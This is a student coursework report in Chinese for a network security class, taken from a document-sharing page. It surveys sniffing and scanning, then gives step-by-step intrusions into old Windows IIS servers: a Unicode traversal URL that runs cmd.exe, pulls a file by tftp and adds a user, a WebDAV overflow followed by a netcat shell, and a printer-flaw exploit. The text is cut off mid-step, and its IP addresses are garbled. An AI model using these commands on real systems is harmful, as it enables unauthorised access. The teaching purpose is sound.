《网络安全技术》课程考查大作业 (8).docxVIP

  • 26
  • 0
  • 约3.12千字
  • 约 9页
  • 2021-11-22 发布于安徽
  • 举报

《网络安全技术》课程考查大作业 (8).docx

大连外国语大学软件学院 成绩评定:《网络安全技术》 成绩评定: 专业:信管英日 年级: 13 班级: 21 姓名: 付豪 学号: 32 黑客常用网络侦听、网络扫描、网络入侵方法简介 (1)网络侦听:网络侦听既可以将网络界面设定成监听模式,并且可以截获网络上所传输的信息。黑客登录网络主机并取得超级用户权限后,若要登录到其它主机,使用网络监听便可以有效地截获网络上的数据。黑客应用包括Wireshark、Sniffer Pro、Win Sniffer、pswmonitor、Iris等工具可以截获数据包内容进行分析,并得到IP地址及发送的数据的内容。 (2)网络扫描:网络扫描是攻击者情报采集的三个组成部分之一。在足迹打印阶段,攻击者创建一个目标组织的轮廓,包含一些信息,例如它的域名系统(DNS),电子邮件服务器,还有IP地址范围。这些信息中大部分可以在线得到。在扫描阶段,攻击者找到了关于特定IP地址的信息,该IP地址可以通过因特网进行评估,如他们的操作系统、系统结构和每台计算机上的服务等等各种相关信息。在列举阶段,攻击者搜集关于网络用户、工作组名称、路由表和简单网络管理协议等资料。网络扫描是确认网络运行的主机的工作程序,或是为了对主机进行攻击,或是为了网络安全评估。网络扫描程序,如Ping扫射和端口扫描,返回关于哪个IP地址映射有主机连接到因特网上的并是工作的,这些主机提供什么样的服务的信息。另一种扫描方法是反向映射,返回关于哪个IP地址上没有映射出活动的主机的信息,这使攻击者能假设出可行的地址。包括系统用户扫描、开放端口扫描、共享目录扫描、利用TCP协议进行端口扫描、漏洞扫描等。 (3)网络入侵:既黑客通过网络对电脑进行远程操控或者破坏。 第一种入侵方法 通过UniCode漏洞入侵。 2.1 方法原理(介绍第一种采用什么方法入侵对方系统) Unicode漏洞是攻击者可通过IE浏览器远程运行被攻击计算机的cmd.exe文件,从而使该计算机的文件暴露,且可随意执行和更改文件的漏洞。 2.2 入侵过程(描述入侵的操作过程,配截图详细介绍) ⑴将tftp32idq.dllipsc.exe放在C盘根目录下,建立本地服务器。 (2)在IE中输入如下字符串’09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll’,可以把idq.dll拷贝至目标机的C盘根目录。 ⑶通过” 0/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”可以查看目标机系统盘的目录结构,发现idq.dll已经成功上传。 ⑷在本机上用DOS窗口运行”ispc.exe 0/scripts/idq.dll”,再按两次回车即可进入目标机的DOS窗口,这是我们通过”net use hackliu liubs /add”可以增加一个用户账户。 2.3 入侵结果(成功侵入对方系统之后,黑客可以做什么) 通过Unicode漏洞入侵系统之后,未经授权的用户可以利用IUSR_machinename账号访问用户目录的任何文件。 第二种入侵方法 利用WebDav远程溢出进行攻击 3.1 方法原理(介绍第二种采用什么方法入侵对方系统) WebDav通过IIS来利用这个漏洞的,很多调用这个API的应用程序都存在这个漏洞。 3.2 入侵过程(描述入侵的操作过程,配截图详细介绍) ⑴ 将Webdavx3.exe和nc.exe拷贝至C盘根目录。 ⑵ 在DOS窗口中运行”C:\webdavx3.exe 0”。 ⑶然后在DOS窗口输入“nc.exe –vv 0 7788”。即可介入对方系统并拥有管理员权限。这时我们通过ipconfig可以查看到对方的ip地址。使用dir命令也可以查看对方C盘根目录下的所有文件,如图。 3.3 入侵结果(侵入对方系统之后,黑客可以做什么) 通过webdav远程溢出攻击后,黑客可以用命令提示符进行各种文件的增删改查以及对系统设置的改变。 第三种入侵方法 利用打印机漏洞入侵系统。 4.1 方法原理(介绍第三种采用什么方法入侵对方系统) 利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。 4.2 入侵过程(描述入侵的操作过程,配截图详细介绍) 首先将cniis.exe文件拷贝至主机的C盘根目录下。 ⑵ 通过DOS窗口运行c:\cniis.exe 0 0,即可在对方账户中

文档评论(0)

1亿VIP精品文档

相关文档